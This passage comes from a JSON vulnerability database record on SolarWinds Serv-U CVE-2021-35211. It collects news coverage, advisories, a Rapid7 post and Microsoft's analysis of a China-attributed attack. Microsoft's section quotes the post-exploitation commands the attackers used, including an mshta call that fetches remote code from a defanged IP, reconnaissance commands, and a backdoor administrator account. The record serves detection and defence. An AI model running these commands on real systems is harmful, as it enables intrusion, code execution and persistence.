68[.]235.178.32, or via TCP 443 from the IP address 208[.]113.35.58. Disabling SSH access on the Serv-U installation also prevents compromise.\n\nThe issue has been addressed in [Serv-U version 15.2.3 hotfix (HF) 2](<https://customerportal.solarwinds.com/>).\n\nSolarWinds also stressed in its advisory that the vulnerability is \"completely unrelated to the SUNBURST supply chain attack\" and that it does not affect other products, notably the Orion Platform, which was exploited to drop malware and dig deeper into the targeted networks by suspected Russian hackers to spy on multiple federal agencies and businesses in one of the most serious security breaches in U.S. history.\n\nA string of [software supply chain attacks](<https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html>) since then has highlighted the fragility of modern networks and the sophistication of threat actors to identify hard-to-find vulnerabilities in widely-used software to conduct espionage and drop ransomware, in which hackers shut down the systems of business and demand payment to allow them to regain control.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-13T03:58:00", "type": "thn", "title": "A New Critical SolarWinds Zero-Day Vulnerability Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-14T03:18:35", "id": "THN:8636741FCF3A03B6238D8BAF1D9D00EB", "href": "https://thehackernews.com/2021/07/a-new-critical-solarwinds-zero-day.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-06T10:35:28", "description": "[](<https://thehackernews.com/images/-jSefSyaoEXg/YTMlSOpTaDI/AAAAAAAADuc/6tVl9cVHQocqXEvrp-hkyi73_VGjF59hgCLcBGAsYHQ/s0/SolarWinds.jpg>)\n\nMicrosoft has shared technical details about a now-fixed, actively exploited critical security vulnerability affecting SolarWinds Serv-U managed file transfer service that it has attributed with \"high confidence\" to a 
threat actor operating out of China.\n\nIn mid-July, the Texas-based company [remedied](<https://thehackernews.com/2021/07/a-new-critical-solarwinds-zero-day.html>) a remote code execution flaw ([CVE-2021-35211](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>)) that was rooted in Serv-U's implementation of the Secure Shell (SSH) protocol, which could be abused by attackers to run arbitrary code on the infected system, including the ability to install malicious programs and view, change, or delete sensitive data.\n\n\"The Serv-U SSH server is subject to a pre-auth remote code execution vulnerability that can be easily and reliably exploited in the default configuration,\" Microsoft Offensive Research and Security Engineering team said in a [detailed write-up](<https://www.microsoft.com/security/blog/2021/09/02/a-deep-dive-into-the-solarwinds-serv-u-ssh-vulnerability/>) describing the exploit.\n\n\"An attacker can exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. When successfully exploited, the vulnerability could then allow the attacker to install or run programs, such as in the case of the targeted attack we previously reported,\" the researchers added.\n\nWhile Microsoft [linked](<https://thehackernews.com/2021/07/chinese-hackers-exploit-latest.html>) the attacks to DEV-0322, a China-based collective citing \"observed victimology, tactics, and procedures,\" the company has now revealed that the remote, pre-auth vulnerability stemmed from the manner the Serv-U process handled access violations without terminating the process, thereby making it simple to pull off stealthy, reliable exploitation attempts.\n\n[](<https://thehackernews.com/images/-mBVijrliiYs/YTMhBkqFg5I/AAAAAAAADuU/acCyK_NFBd0EK9Q7CZeW9acGcEZnZe-TQCLcBGAsYHQ/s0/code.jpg>)\n\n\"The exploited vulnerability was caused by the way Serv-U initially created an OpenSSL AES128-CTR context,\" the researchers said. 
\"This, in turn, could allow the use of uninitialized data as a function pointer during the decryption of successive SSH messages.\"\n\n\"Therefore, an attacker could exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. We also discovered that the attackers were likely using DLLs compiled without address space layout randomization (ASLR) loaded by the Serv-U process to facilitate exploitation,\" the researchers added.\n\nASLR refers to a [protection mechanism](<https://www.fireeye.com/blog/threat-research/2020/03/six-facts-about-address-space-layout-randomization-on-windows.html>) that's used to increase the difficulty of performing a buffer overflow attack by randomly arranging the address space positions where system executables are loaded into memory.\n\nMicrosoft, which reported the vulnerability to SolarWinds, said it recommended [enabling ASLR compatibility](<https://docs.microsoft.com/en-us/cpp/build/reference/dynamicbase-use-address-space-layout-randomization?view=msvc-160>) for all binaries loaded in the Serv-U process. \"ASLR is a critical security mitigation for services which are exposed to untrusted remote inputs, and requires that all binaries in the process are compatible in order to be effective at preventing attackers from using hardcoded addresses in their exploits, as was possible in Serv-U,\" the researchers said.\n\nIf anything, the revelations highlight the variety of techniques and tools used by threat actors to breach corporate networks, including piggybacking on legitimate software.\n\nAlthough the SolarWinds supply chain attacks have been formally pinned on Russian APT29 hackers, Microsoft in December 2020 disclosed that a [separate espionage group](<https://thehackernews.com/2020/12/a-second-hacker-group-may-have-also.html>) may have been taking advantage of the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on infected systems. 
Cybersecurity firm Secureworks connected the intrusions to a China-linked threat actor called [Spiral](<https://thehackernews.com/2021/03/solarwinds-hack-new-evidence-suggests.html>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-09-04T07:50:00", "type": "thn", "title": "Microsoft Says Chinese Hackers Were Behind SolarWinds Serv-U SSH 0-Day Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-09-06T10:12:29", "id": "THN:D84F06239D4B68B06712C485E00D6D1F", "href": "https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:41", "description": 
"[](<https://thehackernews.com/new-images/img/a/AVvXsEiPQG1pOGrj0S2b6yg5RN1JCq-IOfI8Pwjmx7-7G2hM_z7iFpFEH5TyTMPgwBtVodFhbeAKPveoF-vCGP69dhLcDcmKRT2Orh6vOk-xqaQlijHze0KKXB0Z07lp1PpajQf7_4d88LSK5McgppRxvCj4XMvIkvxTxGikMr4WhBnVRn1df0J2llcW6fAu>)\n\nMicrosoft on Wednesday disclosed details of a new security vulnerability in SolarWinds Serv-U software that it said was being weaponized by threat actors to propagate attacks leveraging the Log4j flaws to compromise targets.\n\nTracked as [CVE-2021-35247](<https://nvd.nist.gov/vuln/detail/CVE-2021-35247>) (CVSS score: 5.3), the issue is an \"input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation,\" Microsoft Threat Intelligence Center (MSTIC) [said](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#CVE-2021-35247>).\n\nThe flaw, which was discovered by security researcher Jonathan Bar Or, affects Serv-U versions 15.2.5 and prior, and has been addressed in Serv-U version 15.3.\n\n\"The Serv-U web login screen to LDAP authentication was allowing characters that were not sufficiently sanitized,\" SolarWinds [said](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>) in an advisory, adding it \"updated the input mechanism to perform additional validation and sanitization.\"\n\nThe IT management software maker also pointed out that \"no downstream effect has been detected as the LDAP servers ignored improper characters.\" It's not immediately clear if the attacks detected by Microsoft were mere attempts to exploit the flaw or if they were ultimately successful.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEi5M2JItG9gq0ToGqTBs3NVVCDWbgi66iooG7nUw5ULlOefSmalsLcX_kO8aUUZkfkRtrtBROr6e9eVGvuwqO-j6gm2DBIkF--EdS0b0kWuL7RRkA33zflcbxki1TEj-RRo9DFwW-MNMCUp2bfMO38ryaK_FXWqhDyFEd-EjtG7NSGpsYYGaKOuqoK2>)\n\nThe development comes 
as multiple threat actors continue to take advantage of the [Log4Shell flaws](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>) to mass scan and infiltrate vulnerable networks for deploying backdoors, coin miners, ransomware, and remote shells that grant persistent access for further post-exploitation activity.\n\nAkamai researchers, in an [analysis](<https://www.akamai.com/blog/security/mirai-botnet-abusing-log4j-vulnerability>) published this week, also found evidence of the flaws being abused to infect and assist in the proliferation of malware used by the Mirai botnet by targeting [Zyxel networking devices](<https://www.zyxel.com/us/en/support/Zyxel_security_advisory_for_Apache_Log4j_RCE_vulnerability.shtml>).\n\nOn top of this, a China-based hacking group has been previously observed exploiting a critical security vulnerability affecting SolarWinds Serv-U ([CVE-2021-35211](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>)) to install malicious programs on the infected machines.\n\n**_Update:_** In a statement shared with The Hacker News, SolarWinds pointed out that its Serv-U software wasn't exploited in the Log4j attacks, and that attempts were made to log in to SolarWinds Serv-U file-sharing software via attacks exploiting the Log4j flaws.\n\n\"The activity Microsoft was referring to in their report was related to a threat actor attempting to login to Serv-U using the Log4j vulnerability but that attempt failed as Serv-U does not utilize Log4j code and the target for authentication LDAP (Microsoft Active Directory) is not susceptible to Log4J attacks,\" a company spokesperson said.\n\nWhile this directly contradicts Microsoft's original disclosure that attackers were exploiting the previously undisclosed vulnerability in the SolarWinds Serv-U managed file transfer service to propagate Log4j attacks, the attempts ultimately failed because the vulnerable Log4j code isn't present in the software.\n\n_(The story 
has been revised to clarify that Serv-U is not vulnerable to the Log4Shell attacks.)_\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T04:57:00", "type": "thn", "title": "Hackers Attempt to Exploit New SolarWinds Serv-U Bug in Log4Shell Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211", "CVE-2021-35247", "CVE-2021-44228"], "modified": "2022-01-23T06:42:28", "id": "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "href": "https://thehackernews.com/2022/01/microsoft-hackers-exploiting-new.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Microsoft discovered a remote code execution (RCE) vulnerability in the SolarWinds Serv-U product utilizing a Remote Memory Escape Vulnerability.", "cvss3": {"exploitabilityScore": 
3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "SolarWinds Serv-U Remote Memory Escape Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-35211", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-07-12T22:56:36", "description": "\n\nOn July 12, 2021, SolarWinds confirmed an actively exploited zero-day vulnerability, CVE-2021-35211, in the Serv-U FTP and Managed File Transfer component of SolarWinds 15.2.3 HF1 (released May 5, 2021) and all prior versions. Successful exploitation of CVE-2021-35211 could enable an attacker to gain remote code execution on a vulnerable target system. 
The vulnerability only exists when SSH is enabled in the Serv-U environment.\n\nA [hotfix for the vulnerability is available](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>), and **we recommend all customers of SolarWinds Serv-U FTP and Managed File Transfer install this hotfix immediately** (or, at minimum, disable SSH for a temporary mitigation). SolarWinds has emphasized that CVE-2021-35211 only affects Serv-U Managed File Transfer and Serv-U Secure FTP and does not affect any other SolarWinds or N-able (formerly SolarWinds MSP) products. For further details, see [SolarWinds\u2019s advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>).\n\n## Details\n\nThe SolarWinds advisory cites threat intelligence provided by Microsoft. According to Microsoft, a single threat actor unrelated to this year\u2019s earlier [SUNBURST intrusions](<https://www.rapid7.com/blog/post/2020/12/14/solarwinds-sunburst-backdoor-supply-chain-attack-what-you-need-to-know/>) has exploited the vulnerability against a limited, targeted population of SolarWinds customers. The vulnerability exists in all versions of Serv-U 15.2.3 HF1 and earlier. Though Microsoft provided a proof-of-concept exploit to SolarWinds, there are no public proofs-of-concept as of July 12, 2021.\n\nThe vulnerability appears to be in the exception handling functionality in a portion of the software related to processing connections on open sockets. Successful exploitation of the vulnerability will cause the Serv-U product to throw an exception, then will overwrite the exception handler with the attacker\u2019s code, causing remote code execution.\n\n## Detection\n\nSince the vulnerability is in the exception handler, looking for exceptions in the `DebugSocketLog.txt` file may help identify exploitation attempts. 
Note, however, that exceptions can be thrown for many reasons and the presence of an exception in the log does not guarantee that there has been an exploitation attempt.\n\nIP addresses used by the threat actor include:\n \n \n 98.176.196.89 \n 68.235.178.32 \n 208.113.35.58\n \n\nRapid7 does not use SolarWinds Serv-U FTP products anywhere in our environment and is not affected by CVE-2021-35211.\n\nFor further information, see [Solarwinds\u2019s FAQ here](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211#FAQ>).", "cvss3": {}, "published": "2021-07-12T22:39:41", "type": "rapid7blog", "title": "SolarWinds Serv-U FTP and Managed File Transfer CVE-2021-35211: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-12T22:39:41", "id": "RAPID7BLOG:BA6A91F3A0B22C1BFF0C8A73D90FB362", "href": "https://blog.rapid7.com/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-10-08T15:44:47", "description": "\n\nIn today's post, we're giving a rundown of new features and functionality launched in Q3 2021 for [InsightVM](<https://www.rapid7.com/products/insightvm/>) and the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>). We hope you can begin to leverage these changes to drive success across your organization.\n\n## Apple Silicon support on the Insight Agent\n\nWe're excited to announce that the Insight Agent now natively supports Apple Silicon chips!\n\nApple announced the first generation Apple Silicon chip \u2014 the M1 processor \u2014 in November 2020. 
This chip is the new standard on all MacBooks starting with the 2020 releases, and Apple plans to transition completely to Apple Silicon chips over the next two years.\n\nThe new Mac installer specifically designed for the Apple Silicon can be accessed right from Agent Management in the platform, in the download section. Learn more in our [Apple Silicon Agent Support blog post](<https://www.rapid7.com/blog/post/2021/07/08/apple-m1-support-on-insight-agent/>).\n\n\n\n## Asset and Vulnerability Details reports\n\nThis new feature allows you to easily communicate details of your assets and vulnerabilities with stakeholders in a PDF format. Simply click the **Export to PDF** button on the Vulnerability Details page, and you'll have a PDF ready to share!\n\n\n\nThis is particularly useful if you're attempting to collaborate while remediating a specific vulnerability. We'll use a hypothetical security engineer named Jane to illustrate this.\n\nJane recently read about a new ransomware strain that leverages a specific vulnerability as part of an attack chain that seems to be targeting the industry of her organization. She opens the query builder in InsightVM, constructs a search query to identify the vulnerability by CVE, and discovers several instances. She wants to mention this during her morning all-hands sync so she can recruit other team members to her effort. She exports the vulnerability details page to a PDF, which allows her to share this out and provide more details to interested team members, who then can help her remediate this vulnerability much more quickly.\n\nMoreover, while undertaking this effort, another team member \u2014 Bill \u2014 finds an asset that seems to be a complete tragedy in terms of patching and vulnerability prevalence. He creates the Asset Details report and shares this in an e-mail to his team, stating that this asset seems to be missing their organization's patch cycle. 
He also suggests that they look for more of these types of assets because he knows that when there is one offender, there are often many.\n\n## Snyk integration for reporting vulnerabilities\n\nContainer Security assessments will now report Ruby vulnerabilities through an integration with the Snyk vulnerability database. This adds RubyGems packages to our Snyk-based coverage, which currently includes vulnerability detections for Java, JavaScript, and Python libraries. This integration is particularly helpful for organizations that perform scanning of Container Images at rest, in both public and private registries.\n\n## Emergent threat coverage recap\n\nQ3 2021 was another busy quarter for high-priority cybersecurity threats. As part of our emergent threat response process, Rapid7's VRM research and engineering teams released vulnerability checks and in-depth technical analysis to help InsightVM customers understand the risk of exploitation and assess their exposure to critical security threats. In July, [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare/rapid7-analysis?referrer=blog>), dubbed \u201c[PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\" presented remediation challenges for many organizations amid active exploitation of the Windows Print Spooler service. In August, the [ProxyShell](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>) exploit chain put on-premises instances of Microsoft Exchange Server [at risk](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) for remote code execution. 
More recently, widespread attacks took advantage of [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>), a critical flaw in [Confluence Server & Confluence Data Center](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>), to deploy cryptominers, exfiltrate data, and obtain initial access for ransomware operations.\n\nOther notable emergent threats included:\n\n * [ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464/rapid7-analysis?referrer=blog>)\n * [SolarWinds Serv-U FTP and Managed File Transfer (CVE-2021-35211)](<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>)\n * [Microsoft SAM File Readability (CVE-2021-36934)](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [PetitPotam: Novel Attack Chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)\n * [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n\n## Stay tuned!\n\nAs always, we're continuing to work on exciting product enhancements and releases throughout the year. 
Keep an eye on our blog and [release notes](<https://docs.rapid7.com/release-notes/insightvm/>) as we continue to highlight the latest in vulnerability management at Rapid7.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-08T13:30:00", "type": "rapid7blog", "title": "What's New in InsightVM: Q3 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-22005", "CVE-2021-26084", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35464", "CVE-2021-36934", "CVE-2021-40539"], "modified": "2021-10-08T13:30:00", "id": "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "href": "https://blog.rapid7.com/2021/10/08/whats-new-in-insightvm-q3-2021-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-07-26T10:16:52", "description": "# Serv-U CVE-2021-35211 Exploit\n\n## Potential for DoS - check yo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T05:52:17", "type": "githubexploit", "title": "Exploit for Vulnerability in Solarwinds Serv-U", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2022-07-26T06:42:23", "id": "15CF4822-F1E8-5BDB-8E65-8FC88F816E1E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "mssecure": [{"lastseen": "2021-07-27T08:07:52", "description": "Microsoft has detected a 0-day remote code execution exploit being used to attack SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.\n\nThe vulnerability being exploited is CVE-2021-35211, which was [recently patched by SolarWinds](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>). The vulnerability, which Microsoft reported to SolarWinds, exists in Serv-U\u2019s implementation of the Secure Shell (SSH) protocol. 
If Serv-U\u2019s SSH is exposed to the internet, successful exploitation would give attackers the ability to remotely run arbitrary code with privileges, allowing them to perform actions like installing and running malicious payloads, or viewing and changing data. We strongly urge all customers to update their instances of Serv-U to the latest available version.\n\n[Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) has been protecting customers against malicious activity resulting from successful exploitation, even before the security patch was available. Microsoft Defender Antivirus blocks malicious files, behavior, and payloads. Our endpoint protection solution detects and raises alerts for the attacker\u2019s follow-on malicious actions. [Microsoft Threat Experts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/microsoft-threat-experts?view=o365-worldwide>) customers who were affected were notified of attacker activity and were aided in responding to the attack.\n\nMicrosoft would like to thank SolarWinds for their cooperation and quick response to the vulnerability we reported.\n\n## Who is DEV-0322?\n\nMSTIC tracks and investigates a range of malicious cyber activities and operations. During the tracking and investigation phases prior to when MSTIC reaches high confidence about the origin or identity of the actor behind an operation, we refer to the unidentified threat actor as a \u201cdevelopment group\u201d or \u201cDEV group\u201d and assign each DEV group a unique number (DEV-####) for tracking purposes.\n\nMSTIC has observed DEV-0322 targeting entities in the U.S. Defense Industrial Base Sector and software companies. 
This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure.\n\n## Attack details\n\nMSTIC discovered the 0-day attack behavior in Microsoft 365 Defender telemetry during a routine investigation. An anomalous malicious process was found to be spawning from the Serv-U process, suggesting that it had been compromised. Some examples of the malicious processes spawned from _Serv-U.exe_ include:\n\n * _C:\\Windows\\System32\\mshta.exe http://144[.]34[.]179[.]162/a_ (defanged)\n * _cmd.exe /c whoami > "./Client/Common/redacted.txt"_\n * _cmd.exe /c dir > ".\\Client\\Common\\redacted.txt"_\n * _cmd.exe /c ""C:\\Windows\\Temp\\Serv-U.bat""_\n * _powershell.exe C:\\Windows\\Temp\\Serv-U.bat_\n * _cmd.exe /c type \\\\\\redacted\\redacted.Archive > "C:\\ProgramData\\RhinoSoft\\Serv-U\\Users\\Global Users\\redacted.Archive"_\n\nWe observed DEV-0322 piping the output of their _cmd.exe_ commands to files in the Serv-U _\\Client\\Common\\ _folder, which is accessible from the internet by default, so that the attackers could retrieve the results of the commands. The actor was also found adding a new [global user](<https://documentation.solarwinds.com/en/success_center/servu/content/servu-global-users-global-users.htm>) to Serv-U, effectively adding themselves as a Serv-U administrator, by manually creating a crafted_ .Archive _file in the _Global Users_ directory. Serv-U user information is stored in these _.Archive _files.\n\nDue to the way DEV-0322 had written their code, when the exploit successfully compromises the Serv-U process, an exception is generated and logged to a Serv-U log file, _DebugSocketLog.txt_. The process could also crash after a malicious command was run.\n\nBy reviewing telemetry, we identified features of the exploit, but not a root-cause vulnerability. 
MSTIC worked with the Microsoft Offensive Security Research team, who performed vulnerability research on the Serv-U binary and identified the vulnerability through black box analysis. Once a root cause was found, we reported the vulnerability to SolarWinds, who responded quickly to understand the issue and build a patch.\n\nTo protect customers before a patch was available, the Microsoft 365 Defender team quickly released detections that catch known malicious behaviours, ensuring customers are protected from and alerted to malicious activity related to the 0-day. Affected customers enrolled to Microsoft Threat Experts, our managed threat hunting service, received a [targeted attack notification](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/microsoft-threat-experts?view=o365-worldwide#microsoft-threat-experts---targeted-attack-notification>), which contained details of the compromise. The Microsoft Threat Experts and MSTIC teams worked closely with these customers to respond to the attack and ensure their environments were secure.\n\n## Detection guidance\n\nCustomers should review the Serv-U _DebugSocketLog.txt_ log file for exception messages like the line below. A _C0000005; CSUSSHSocket::ProcessReceive_ exception can indicate that an exploit was attempted, but it can also appear for unrelated reasons. Either way, if the exception is found, customers should carefully review their logs for behaviors and indicators of compromise discussed 